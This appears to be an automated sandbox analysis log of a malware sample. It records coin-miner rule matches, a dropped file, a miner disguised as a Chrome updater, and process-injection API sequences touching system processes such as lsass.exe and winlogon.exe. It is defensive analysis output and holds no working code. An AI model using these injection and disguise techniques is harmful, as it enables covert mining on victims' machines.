                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                                  Source: C:\Windows\Temp\wxyubnjmnlae.tmp, type: DROPPEDMatched rule: Detects coinmining malware Author: ditekSHen
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A1310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,17_2_00007FF65A1310C0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,22_2_00000225DC6428C8
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AE202C NtQuerySystemInformation,StrCmpNIW,26_2_00000202C0AE202C
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF0228C8 NtEnumerateValueKey,NtEnumerateValueKey,30_2_000002BAAF0228C8
                                  Source: C:\Windows\System32\dialer.exeCode function: 45_2_00007FF7C6D610C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,45_2_00007FF7C6D610C0
                                  Source: C:\Windows\System32\dialer.exeCode function: 49_2_00007FF713F14020 NtOpenKey,49_2_00007FF713F14020
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000E6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,4_2_000E6FAA
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\gqxqtdeqxchk.sys
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile deleted: C:\Windows\Temp\wxyubnjmnlae.tmp
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3410380_2_00007FF61D341038
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D337F4C0_2_00007FF61D337F4C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3279600_2_00007FF61D327960
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3464700_2_00007FF61D346470
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3473BC0_2_00007FF61D3473BC
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D332E500_2_00007FF61D332E50
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D346E700_2_00007FF61D346E70
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3466EC0_2_00007FF61D3466EC
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D331D900_2_00007FF61D331D90
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D337D980_2_00007FF61D337D98
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D33E5B00_2_00007FF61D33E5B0
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D337F4C0_2_00007FF61D337F4C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D34A0F80_2_00007FF61D34A0F8
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D33E11C0_2_00007FF61D33E11C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3290D00_2_00007FF61D3290D0
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D331F940_2_00007FF61D331F94
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D321F500_2_00007FF61D321F50
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D34481C0_2_00007FF61D34481C
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3360300_2_00007FF61D336030
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3387D00_2_00007FF61D3387D0
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3337E00_2_00007FF61D3337E0
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D341FE40_2_00007FF61D341FE4
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3319800_2_00007FF61D331980
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3321A00_2_00007FF61D3321A0
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D33A5300_2_00007FF61D33A530
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3443800_2_00007FF61D344380
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D331B840_2_00007FF61D331B84
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3410380_2_00007FF61D341038
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D3323A40_2_00007FF61D3323A4
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D33EC300_2_00007FF61D33EC30
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 0_2_00007FF61D333BE40_2_00007FF61D333BE4
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: 1_2_00007FFE1A4575081_2_00007FFE1A457508
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000E848E4_2_000E848E
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F6CDC4_2_000F6CDC
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F40884_2_000F4088
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F00B74_2_000F00B7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000E40FE4_2_000E40FE
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F71534_2_000F7153
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_001051C94_2_001051C9
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F62CA4_2_000F62CA
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000E32F74_2_000E32F7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F43BF4_2_000F43BF
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000EC4264_2_000EC426
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_0010D4404_2_0010D440
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000EF4614_2_000EF461
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F77EF4_2_000F77EF
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000E286B4_2_000E286B
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_0010D8EE4_2_0010D8EE
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000EE9B74_2_000EE9B7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_001119F44_2_001119F4
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000F3E0B4_2_000F3E0B
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_00104F9A4_2_00104F9A
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: 4_2_000EEFE24_2_000EEFE2
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CD18205_2_00007FFDF7CD1820
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB98405_2_00007FFDF7CB9840
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB37C85_2_00007FFDF7CB37C8
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D276B05_2_00007FFDF7D276B0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DE16605_2_00007FFDF7DE1660
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D2B6705_2_00007FFDF7D2B670
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D0756A5_2_00007FFDF7D0756A
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D195905_2_00007FFDF7D19590
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DD95105_2_00007FFDF7DD9510
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D4D4E05_2_00007FFDF7D4D4E0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D054805_2_00007FFDF7D05480
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D494305_2_00007FFDF7D49430
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA73805_2_00007FFDF7CA7380
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CCD3805_2_00007FFDF7CCD380
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CE12F05_2_00007FFDF7CE12F0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CAF2E85_2_00007FFDF7CAF2E8
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF91B05_2_00007FFDF7CF91B0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DDB1805_2_00007FFDF7DDB180
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D331905_2_00007FFDF7D33190
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D611205_2_00007FFDF7D61120
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DC51305_2_00007FFDF7DC5130
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D830805_2_00007FFDF7D83080
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CBA0205_2_00007FFDF7CBA020
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CBC0205_2_00007FFDF7CBC020
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D1C0205_2_00007FFDF7D1C020
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DE7FB05_2_00007FFDF7DE7FB0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D8FF205_2_00007FFDF7D8FF20
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CEFEF05_2_00007FFDF7CEFEF0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D2DF105_2_00007FFDF7D2DF10
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF5EE05_2_00007FFDF7CF5EE0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CEDF005_2_00007FFDF7CEDF00
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D8BCC05_2_00007FFDF7D8BCC0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CE3C605_2_00007FFDF7CE3C60
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D4DC605_2_00007FFDF7D4DC60
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D23C505_2_00007FFDF7D23C50
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D47BD05_2_00007FFDF7D47BD0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB1BA45_2_00007FFDF7CB1BA4
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D05BD05_2_00007FFDF7D05BD0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CCFB005_2_00007FFDF7CCFB00
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D459E05_2_00007FFDF7D459E0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D119F05_2_00007FFDF7D119F0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D499D05_2_00007FFDF7D499D0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CC19A05_2_00007FFDF7CC19A0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA998C5_2_00007FFDF7CA998C
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA99895_2_00007FFDF7CA9989
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CED9805_2_00007FFDF7CED980
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DF59305_2_00007FFDF7DF5930
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA59445_2_00007FFDF7CA5944
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D9A7805_2_00007FFDF7D9A780
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D046D05_2_00007FFDF7D046D0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA44F05_2_00007FFDF7CA44F0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D165105_2_00007FFDF7D16510
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CA84D85_2_00007FFDF7CA84D8
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CC64205_2_00007FFDF7CC6420
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CC44505_2_00007FFDF7CC4450
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CAC4405_2_00007FFDF7CAC440
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D703905_2_00007FFDF7D70390
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D263005_2_00007FFDF7D26300
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D0C3005_2_00007FFDF7D0C300
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF01D05_2_00007FFDF7CF01D0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DB81705_2_00007FFDF7DB8170
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D501005_2_00007FFDF7D50100
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D920F05_2_00007FFDF7D920F0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF70105_2_00007FFDF7CF7010
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D2AFF05_2_00007FFDF7D2AFF0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DE0F905_2_00007FFDF7DE0F90
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF4F505_2_00007FFDF7CF4F50
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF2EC05_2_00007FFDF7CF2EC0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CDEE605_2_00007FFDF7CDEE60
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D92E605_2_00007FFDF7D92E60
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CACE305_2_00007FFDF7CACE30
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DF4E005_2_00007FFDF7DF4E00
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB4E105_2_00007FFDF7CB4E10
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D60D805_2_00007FFDF7D60D80
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CD0D905_2_00007FFDF7CD0D90
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CECD405_2_00007FFDF7CECD40
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D12D005_2_00007FFDF7D12D00
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CD8CF05_2_00007FFDF7CD8CF0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D44BA05_2_00007FFDF7D44BA0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CEEBD05_2_00007FFDF7CEEBD0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D52BB05_2_00007FFDF7D52BB0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DE4B905_2_00007FFDF7DE4B90
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CFEB205_2_00007FFDF7CFEB20
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CF0B505_2_00007FFDF7CF0B50
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D06B105_2_00007FFDF7D06B10
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D1AA005_2_00007FFDF7D1AA00
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7DD69C05_2_00007FFDF7DD69C0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CBC9A05_2_00007FFDF7CBC9A0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CDE9A05_2_00007FFDF7CDE9A0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D849B05_2_00007FFDF7D849B0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D329805_2_00007FFDF7D32980
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CCA9805_2_00007FFDF7CCA980
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D129565_2_00007FFDF7D12956
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CB49405_2_00007FFDF7CB4940
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7D8A8E05_2_00007FFDF7D8A8E0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CC28A05_2_00007FFDF7CC28A0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CD28C05_2_00007FFDF7CD28C0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFDF7CDA8605_2_00007FFDF7CDA860
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8CFC385_2_00007FFD9B8CFC38
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8CFBC05_2_00007FFD9B8CFBC0
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8CBA405_2_00007FFD9B8CBA40
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8BF8985_2_00007FFD9B8BF898
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A6EB85_2_00007FFD9B8A6EB8
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A4D115_2_00007FFD9B8A4D11
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8C6D585_2_00007FFD9B8C6D58
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A74505_2_00007FFD9B8A7450
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8D33305_2_00007FFD9B8D3330
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A62805_2_00007FFD9B8A6280
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A32CB5_2_00007FFD9B8A32CB
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A71C85_2_00007FFD9B8A71C8
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A57FB5_2_00007FFD9B8A57FB
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8E25705_2_00007FFD9B8E2570
                                  Source: C:\ProgramData\main.exeCode function: 5_2_00007FFD9B8A35015_2_00007FFD9B8A3501
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A1314D817_2_00007FF65A1314D8
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A13226C17_2_00007FF65A13226C
                                  Source: C:\Windows\System32\dialer.exeCode function: 17_2_00007FF65A13256017_2_00007FF65A132560
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC611F2C22_2_00000225DC611F2C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC61D0E022_2_00000225DC61D0E0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6238A822_2_00000225DC6238A8
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC642B2C22_2_00000225DC642B2C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC64DCE022_2_00000225DC64DCE0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6544A822_2_00000225DC6544A8
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC671F2C22_2_00000225DC671F2C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC67D0E022_2_00000225DC67D0E0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6838A822_2_00000225DC6838A8
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6A2B2C22_2_00000225DC6A2B2C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6ADCE022_2_00000225DC6ADCE0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 22_2_00000225DC6B44A822_2_00000225DC6B44A8
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AB1F2C26_2_00000202C0AB1F2C
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AC38A826_2_00000202C0AC38A8
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0ABD0E026_2_00000202C0ABD0E0
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AE2B2C26_2_00000202C0AE2B2C
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AF44A826_2_00000202C0AF44A8
                                  Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AEDCE026_2_00000202C0AEDCE0
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612D1F2C29_2_000002A6612D1F2C
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612DD0E029_2_000002A6612DD0E0
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612E38A829_2_000002A6612E38A8
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A661302B2C29_2_000002A661302B2C
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66131AEC529_2_000002A66131AEC5
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130DCE029_2_000002A66130DCE0
                                  Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6613144A829_2_000002A6613144A8
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEFF1F2C30_2_000002BAAEFF1F2C
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF0038A830_2_000002BAAF0038A8
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEFFD0E030_2_000002BAAEFFD0E0
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF022B2C30_2_000002BAAF022B2C
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF0344A830_2_000002BAAF0344A8
                                  Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF02DCE030_2_000002BAAF02DCE0
                                  Source: C:\Windows\System32\dialer.exeCode function: 45_2_00007FF7C6D614D845_2_00007FF7C6D614D8
                                  Source: C:\Windows\System32\dialer.exeCode function: 45_2_00007FF7C6D6226C45_2_00007FF7C6D6226C
                                  Source: C:\Windows\System32\dialer.exeCode function: 45_2_00007FF7C6D6256045_2_00007FF7C6D62560
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A8799D0E051_2_0000026A8799D0E0
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879A38A851_2_0000026A879A38A8
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A87991F2C51_2_0000026A87991F2C
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879CDCE051_2_0000026A879CDCE0
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879D44A851_2_0000026A879D44A8
                                  Source: C:\Windows\System32\svchost.exeCode function: 51_2_0000026A879C2B2C51_2_0000026A879C2B2C
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
                                  Source: C:\Users\user\Desktop\hacn.exeCode function: String function: 00007FF61D322B30 appears 47 times
                                  Source: C:\Windows\System32\dialer.exeCode function: String function: 00007FF713F14020 appears 31 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: String function: 000FEB78 appears 39 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: String function: 000FEC50 appears 56 times
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75722\s.exeCode function: String function: 000FF5F0 appears 31 times
                                  Source: C:\ProgramData\main.exeCode function: String function: 00007FFDF7DF5E90 appears 115 times
                                  Source: C:\ProgramData\main.exeCode function: String function: 00007FFDF7DF4710 appears 98 times
                                  Source: C:\ProgramData\main.exeCode function: String function: 00007FFDF7DF5C60 appears 241 times
                                  Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                  Source: wxyubnjmnlae.tmp.6.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Source: updater.exe.6.drStatic PE information: Number of sections : 11 > 10
                                  Source: setup.exe.4.drStatic PE information: Number of sections : 11 > 10
                                  Source: hacn.exe, 00000000.00000003.1643946967.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs hacn.exe
                                  Source: hacn.exe, 00000000.00000003.1644444350.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs hacn.exe
                                  Source: hacn.exe, 00000000.00000003.1644312651.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs hacn.exe
                                  Source: hacn.exe, 00000000.00000003.1643815403.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs hacn.exe
                                  Source: hacn.exe, 00000000.00000003.1643673285.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs hacn.exe
                                  Source: hacn.exe, 00000000.00000003.1650246671.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs hacn.exe
                                  Source: hacn.exe, 00000000.00000003.1650710045.0000021BE6A14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs hacn.exe
                                  Source: hacn.exe, 00000000.00000003.1644141344.0000021BE6A13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs hacn.exe
                                  Source: hacn.exeBinary or memory string: OriginalFilename vs hacn.exe
                                  Source: hacn.exe, 00000001.00000002.1667137238.00007FFDFB898000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython310.dll. vs hacn.exe
                                  Source: hacn.exe, 00000001.00000002.1667682704.00007FFE1A467000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs hacn.exe
                                  Source: C:\Users\user\Desktop\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
